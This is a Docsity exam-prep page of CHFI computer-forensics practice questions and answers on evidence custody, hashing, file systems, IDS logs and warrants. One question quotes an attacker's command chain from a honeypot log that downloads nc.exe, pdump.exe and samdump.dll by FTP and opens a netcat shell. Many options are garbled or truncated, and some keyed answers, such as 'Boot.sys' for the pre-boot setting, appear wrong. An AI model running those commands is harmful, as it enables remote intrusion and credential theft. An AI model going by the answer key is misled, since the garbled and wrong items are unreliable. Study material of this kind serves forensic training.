Docsity
Docsity

Prepare for your exams
Prepare for your exams

Study with the several resources on Docsity


Earn points to download
Earn points to download

Earn points by helping other students or get them with a premium plan


Guidelines and tips
Guidelines and tips

CHFI-1 Questions and Answers: Computer Forensics Exam Preparation, Exams of Computer Science

A set of multiple-choice questions and answers related to the chfi-1 (computer hacking forensic investigator) certification exam. It covers various aspects of computer forensics, including evidence collection, analysis, and legal considerations. The questions are designed to test the understanding of key concepts and procedures used in digital investigations.

Typology: Exams

2024/2025

Available from 12/29/2024

tizian-kylan
tizian-kylan 🇺🇸

2.7

(21)

3.7K documents

1 / 21

Toggle sidebar

This page cannot be seen from the preview

Don't miss anything!

bg1
CHFI-1 QUESTIONS AND ANSWERS
100% PASS
When an investigator contacts by telephone the domain administrator or controller listed by a
Who is lookup to request all e-mails sent and received for a user account be preserved, what
U.S.C. statute authorizes this phone call and obligates the ISP to preserve e-mail records?
A. Title 18, Section 1030
B. Title 18, Section 2703(d)
C. Title 18, Section Chapter 90
D. Title 18, Section 2703(f)
Title 18, Section 2703(f)
Item 2If you come across a sheepdip machine at your client site, what would you infer?
A. A sheepdip coordinates several honeypots
B. A sheepdip computer is another name for a honeypot
C. A sheepdip computer is used only for virus-checking.
D. A sheepdip computer defers a denial of service attack
A sheepdip computer is used only for virus-checking
In a computer forensics investigation, what describes the route that evidence takes from the time
you find it until the case is closed or goes to court?
A. rules of evidence
B. law of probability
pf3
pf4
pf5
pf8
pf9
pfa
pfd
pfe
pff
pf12
pf13
pf14
pf15

Partial preview of the text

Download CHFI-1 Questions and Answers: Computer Forensics Exam Preparation and more Exams Computer Science in PDF only on Docsity!

CHFI- 1 QUESTIONS AND ANSWERS

100% PASS

When an investigator contacts by telephone the domain administrator or controller listed by a Who is lookup to request all e-mails sent and received for a user account be preserved, what U.S.C. statute authorizes this phone call and obligates the ISP to preserve e-mail records? A. Title 18, Section 1030 B. Title 18, Section 2703(d) C. Title 18, Section Chapter 90 D. Title 18, Section 2703(f)

Title 18, Section 2703(f)

Item 2If you come across a sheepdip machine at your client site, what would you infer? A. A sheepdip coordinates several honeypots B. A sheepdip computer is another name for a honeypot C. A sheepdip computer is used only for virus-checking. D. A sheepdip computer defers a denial of service attack

A sheepdip computer is used only for virus-checking

In a computer forensics investigation, what describes the route that evidence takes from the time you find it until the case is closed or goes to court? A. rules of evidence B. law of probability

C. chain of custody D. policy of separation

chain of custody

How many characters long is the fixed-length MD5 algorithm checksum of a critical system file? A. 128 B. 64 C. 32 D. 16

32

You are working on a thesis for your doctorate degree in Computer Science. Your thesis is based on HTML, DHTML, and other web-based languages and how they have evolved over the years.You navigate to archive. org and view the HTML code of news.com. You then navigate to the current news.com website and copy over the source code. While searching through the code, you come across something abnormal: What have you found? A. Web bug B. CGI code C. Trojan.downloader D. Blind bug

Web bug

You are using DriveSpy, a forensic tool and want to copy 150 sectors where the starting sector is 1709 on the primary hard drive. Which of the following formats correctly specifies these sectors? A. 0:1000, 150

C. The attacker has used a Trojan on port 32773 D. The attacker has installed a backdoor

The attacker has conducted a network sweep on port 111

The newer Macintosh Operating System is based on: A. OS/ B. BSD Unix C. Linux D. Microsoft Windows

BSD Unix

Before you are called to testify as an expert, what must an attorney do first? A. engage in damage control B. prove that the tools you used to conduct your examination are perfect C. read your curriculum vitae to the jury D. qualify you as an expert witness

qualify you as an expert witness

You are contracted to work as a computer forensics investigator for a regional bank that has four 30 TB storage area networks that store customer data.What method would be most efficient for you to acquire digital evidence from this network? A. create a compressed copy of the file with DoubleSpace B. create a sparse data copy of a folder or file C. make a bit-stream disk-to-image file D. make a bit-stream disk-to-disk file

make a bit-stream disk-to-image file

You are working for a large clothing manufacturer as a computer forensics investigator and are called in to investigate an unusual case of an employee possibly stealing clothing designs from the company and selling them under a different brand name for a different company. What you discover during the course of the investigation is that the clothing designs are actually original products of the employee and the company has no policy against an employee selling his own designs on his own time. The only thing that you can find that the employee is doing wrong is that his clothing design incorporates the same graphic symbol as that of the company with only the wording in the graphic being different. What area of the law is the employee violating? A. trademark law B. copyright law C. printright law D. brandmark law

trademark law

What file structure database would you expect to find on floppy disks? A. NTFS B. FAT C. FAT D. FAT

FAT

What type of attack occurs when an attacker can force a router to stop forwarding packets by flooding the router with many open connections simultaneously so that all the hosts behind the

investigator do to prove the violation? A. Image the disk and try to recover deleted files B. Seek the help of co-workers who are eye-witnesses C. Check the Windows registry for connection data (you may or may not recover) D. Approach the websites for evidence

Image the disk and try to recover deleted files

A(n) _____________________ is one that's performed by a computer program rather than the attacker manually performing the steps in the attack sequence. A. blackout attack B. automated attack C. distributed attack D. central processing attack

automated attack

The offset in a hexadecimal code is: A. The last byte after the colon B. The 0x at the beginning of the code C. The 0x at the end of the code D. The first byte after the colon

The 0x at the beginning of the code

It takes _____________ mismanaged case/s to ruin your professional reputation as a computer forensics examiner? A. by law, three

B. quite a few C. only one D. at least two

only one

With the standard Linux second extended file system (Ext2fs), a file is deleted when the inode internal link count reaches ________. A. 0 B. 10 C. 100 D. 1

0

When examining the log files from a Windows IIS Web Server, how often is a new log file created? A. the same log is used at all times B. a new log file is created everyday C. a new log file is created each week D. a new log is created each time the Web Server is started

a new log file is created everyday

Which part of the Windows Registry contains the user's password file? A. HKEY_LOCAL_MACHINE B. HKEY_CURRENT_CONFIGURATION

C. Pre Operational Situation Test D. Primary Operating System Test

PowerOn Self Test

Which legal document allows law enforcement to search an office, place of business, or other locale for evidence relating to an alleged crime? A. bench warrant B. wire tap C. subpoena D. search warrant

search warrant

You are working as an investigator for a corporation and you have just received instructions from your manager to assist in the collection of 15 hard drives that are part of an ongoing investigation.Your job is to complete the required evidence custody forms to properly document each piece of evidence as it is collected by other members of your team. Your manager instructs you to complete one multi-evidence form for the entire case and a single-evidence form for each hard drive. How will these forms be stored to help preserve the chain of custody of the case? A. All forms should be placed in an approved secure container because they are now primary evidence in the case. B. The multi-evidence form should be placed in the report file and the single-evidence forms should be kept with each hard drive in an approved secure container. C. The multi-evidence form should be placed in an approved secure container with the hard drives and the single-evidence forms should be placed in the report file.

D. All forms should be placed in the report file because they are now primary evidence in the case.

The multi-evidence form should be placed in the report file and the single-evidence forms should be kept with each hard drive in an approved secure container.

The MD5 program is used to: A. wipe magnetic media before recycling it B. make directories on an evidence disk C. view graphics files on an evidence drive D. verify that a disk is not altered when you examine it

verify that a disk is not altered when you examine it

Which is a standard procedure to perform during all computer forensics investigations? A. with the hard drive removed from the suspect PC, check the date and time in the system's CMOS B. with the hard drive in the suspect PC, check the date and time in the File Allocation Table C. with the hard drive removed from the suspect PC, check the date and time in the system's RAM D. with the hard drive in the suspect PC, check the date and time in the system's CMOS

with the hard drive removed from the suspect PC, check the date and time in the system's CMOS

E-mail logs contain which of the following information to help you in your investigation? (Choose four.) A. user account that was used to send the account B. attachments sent with the e-mail message

You are assigned to work in the computer forensics lab of a state police agency. While working on a high profile criminal case, you have followed every applicable procedure, however your boss is still concerned that the defense attorney might question whether evidence has been changed while at the lab. What can you do to prove that the evidence is the same as it was when it first entered the lab? A. make an MD5 hash of the evidence and compare it with the original MD5 hash that was taken when the evidence first entered the lab B. make an MD5 hash of the evidence and compare it to the standard database developed by NIST C. there is no reason to worry about this possible claim because state labs are certified D. sign a statement attesting that the evidence is the same as it was when it entered the lab

make an MD5 hash of the evidence and compare it with the original MD5 hash that was taken when the evidence first entered the lab

Study the log given below and answer the following question:Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer:

38.31.107.87:2291 -> 172.16.1.101:53Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0)Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by simple(uid=506)Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558Precautionary measures to prevent this attack would include writing firewall rules. Of these firewall rules, which among the following would be appropriate? A. Disallow UDP53 in from outside to DNS server B. Allow UDP53 in from DNS server to outside C. Disallow TCP53 in from secondaries or ISP server to DNS server D. Block all UDP traffic

Disallow UDP53 in from outside to DNS server

When monitoring for both intrusion and security events between multiple computers, it is essential that the computers' clocks are synchronized. Synchronized time allows an administrator to reconstruct what took place during an attack against multiple computers. Without synchronized time, it is very difficult to determine exactly when specific events took place, and how events interlace. What is the name of the service used to synchronize time among multiple computers? A. Universal Time Set B. Network Time Protocol C. SyncTime Service D. Time-Sync Protocol

172.16.1.107:53Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0)Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by simple(uid=506)Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558From the options given below choose the one which best interprets the following entry:Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107: A. An IDS evasion technique B. A buffer overflow attempt C. A DNS zone transfer D. Data being retrieved from 63.226.81.

A buffer overflow attempt

What happens when a file is deleted by a Microsoft operating system using the FAT file system? A. only the reference to the file is removed from the FAT B. the file is erased and cannot be recovered C. a copy of the file is stored and the original file is erased D. the file is erased but can be recovered

only the reference to the file is removed from the FAT

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File PermissionCanonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries aUnicode attack and eventually succeeds in displaying boot.ini.He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below."cmd1.exe /c open 213.116.251.

ftpcom""cmd1.exe /c echo johna2k >>ftpcom""cmd1.exe /c echo haxedj

ftpcom""cmd1.exe /c echo get nc.exe >>ftpcom""cmd1.exe /c echo get pdump.exe ftpcom""cmd1.exe /c echo get samdump.dll >>ftpcom""cmd1.exe /c echo quit ftpcom""cmd1.exe /c ftp -s:ftpcom""cmd1.exe /c nc -l -p 6969 -e cmd1.exe"What can you infer from the exploit given? A. It is a local exploit where the attacker logs in using username johna2k B. There are two attackers on the system - johna2k and haxedj C. The attack is a remote exploit and the hacker downloads three files D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

The attack is a remote exploit and the hacker downloads three files

What term is used to describe a cryptographic technique for embedding information into something else for the sole purpose of hiding that information from the casual observer? A. rootkit B. key escrow

A. The system files have been copied by a remote attacker B. The system administrator has created an incremental backup C. The system has been compromised using a t0rnrootkit D. Nothing in particular as these can be operational files

The system has been compromised using a t0rnrootkit

rom the following spam mail header, identify the host IP that sent this spam?From jie02@netvigator.com jie02@netvigator.com Tue Nov 27 17:27:11 2001Received: from viruswall.ie.cuhk.edu.hk (viruswall [137.189.96.52]) by eng.ie.cuhk.edu.hk(8.11.6/8.11.6) with ESMTP idfAR9RAP23061 for ; Tue, 27 Nov 2001 17:27:10 +0800 (HKT)Received: from mydomain.com (pcd249020.netvigator.com [203.218.39.20]) by viruswall.ie.cuhk.edu.hk (8.12.1/8.12.1) with SMTP id fAR9QXwZ018431 for ; Tue, 27 Nov 2001 17:26:36 + (HKT)Message-Id: >200111270926.fAR9QXwZ018431@viruswall.ie.cuhk.edu.hkFrom: "china hotel web"To: "Shlam"Subject: SHANGHAI (HILTON HOTEL) PACKAGEDate: Tue, 27 Nov 2001 17:25:58 +0800 MIME-Version: 1.0X-Priority: 3 X-MSMail-Priority: Normal -Reply-To: "china hotel web" A. 137.189.96. B. 8.12.1. C. 203.218.39. D. 203.218.39.

203.218.39.

If you plan to startup a suspect's computer, you must modify the ___________ to ensure that you do not contaminate or alter data on the suspect's hard drive by booting to the hard drive.

A. deltree command B. CMOS C. Boot.sys D. Scandisk utility

Boot.sys

You are working for a local police department that services a population of 1,000,000 people and you have been given the task of building a computer forensics lab. How many law-enforcement computer investigators should you request to staff the lab? A. 8 B. 1 C. 4 D. 2

4

When obtaining a warrant, it is important to: A. particularlydescribe the place to be searched and particularly describe the items to be seized B. generallydescribe the place to be searched and particularly describe the items to be seized C. generallydescribe the place to be searched and generally describe the items to be seized D. particularlydescribe the place to be searched and generally describe the items to be seized

particularlydescribe the place to be searched and particularly describe the items to be seized

What does the superblock in Linux define? A. filesynames B. diskgeometr